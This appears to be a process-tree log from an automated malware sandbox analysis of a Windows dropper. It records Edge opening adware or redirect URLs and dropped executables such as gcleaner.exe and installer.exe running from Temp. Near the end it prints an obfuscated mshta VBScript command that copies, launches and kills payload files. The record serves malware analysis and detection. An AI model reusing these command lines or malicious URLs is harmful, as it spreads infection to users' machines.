C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e613⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148313⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151313⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721513⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=426311913⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xe4,0xe8,0xdc,0xe0,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=129423113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1492888&var=313⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1343177&var=313⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=133968013⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xc0,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1620783&var=313⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xe4,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=134317813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.cloud-security.xyz/u/script/redirect.php?zoneid=46513⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.cloud-security.xyz/u/script/redirect.php?zoneid=46613⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e613⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0x78,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148313⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151313⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xe0,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721513⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=426311913⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=129423113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1492888&var=313⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Users\Admin\AppData\Local\Temp\9a-b7182-491-d25bb-707117f366f76\SHigaeloxica.exe"C:\Users\Admin\AppData\Local\Temp\9a-b7182-491-d25bb-707117f366f76\SHigaeloxica.exe"12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3zgv0bbb.vnn\GcleanerEU.exe /eufive & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\3zgv0bbb.vnn\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\3zgv0bbb.vnn\GcleanerEU.exe /eufive14⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 49716 -s 24015⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l5pjkz0t.ixe\installer.exe /qn CAMPAIGN="654" & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\l5pjkz0t.ixe\installer.exeC:\Users\Admin\AppData\Local\Temp\l5pjkz0t.ixe\installer.exe /qn CAMPAIGN="654"14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\43u2tlft.2vo\any.exe & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\43u2tlft.2vo\any.exeC:\Users\Admin\AppData\Local\Temp\43u2tlft.2vo\any.exe14⤵
-
C:\Users\Admin\AppData\Local\Temp\43u2tlft.2vo\any.exe"C:\Users\Admin\AppData\Local\Temp\43u2tlft.2vo\any.exe" -u15⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\clryhlav.51o\gcleaner.exe /mixfive & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\clryhlav.51o\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\clryhlav.51o\gcleaner.exe /mixfive14⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8984 -s 23615⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\511zxmyo.pfo\autosubplayer.exe /S & exit13⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g3xlarsx.cqq\GcleanerEU.exe /eufive & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\g3xlarsx.cqq\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\g3xlarsx.cqq\GcleanerEU.exe /eufive14⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6428 -s 23615⤵
- Program crash
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4ipbouhz.ns0\installer.exe /qn CAMPAIGN="654" & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\4ipbouhz.ns0\installer.exeC:\Users\Admin\AppData\Local\Temp\4ipbouhz.ns0\installer.exe /qn CAMPAIGN="654"14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ovxzoxzb.pao\any.exe & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\ovxzoxzb.pao\any.exeC:\Users\Admin\AppData\Local\Temp\ovxzoxzb.pao\any.exe14⤵
-
C:\Users\Admin\AppData\Local\Temp\ovxzoxzb.pao\any.exe"C:\Users\Admin\AppData\Local\Temp\ovxzoxzb.pao\any.exe" -u15⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xibq5u3u.ksn\gcleaner.exe /mixfive & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\xibq5u3u.ksn\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\xibq5u3u.ksn\gcleaner.exe /mixfive14⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 49868 -s 24015⤵
- Program crash
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\chv35b53.tln\autosubplayer.exe /S & exit13⤵
-
C:\Users\Admin\Pictures\Adobe Films\8EqV4eNR78bCYwfbybj8MsVz.exe"C:\Users\Admin\Pictures\Adobe Films\8EqV4eNR78bCYwfbybj8MsVz.exe"9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\8EqV4eNR78bCYwfbybj8MsVz.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\8EqV4eNR78bCYwfbybj8MsVz.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\8EqV4eNR78bCYwfbybj8MsVz.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\8EqV4eNR78bCYwfbybj8MsVz.exe" ) do taskkill -f -iM "%~NxM"11⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "8EqV4eNR78bCYwfbybj8MsVz.exe"12⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\RhYYZNfjWIhndp3XngE_T5Lc.exe"C:\Users\Admin\Pictures\Adobe Films\RhYYZNfjWIhndp3XngE_T5Lc.exe"9⤵
-
C:\Users\Admin\Pictures\Adobe Films\RhYYZNfjWIhndp3XngE_T5Lc.exe"C:\Users\Admin\Pictures\Adobe Films\RhYYZNfjWIhndp3XngE_T5Lc.exe" -u10⤵
-
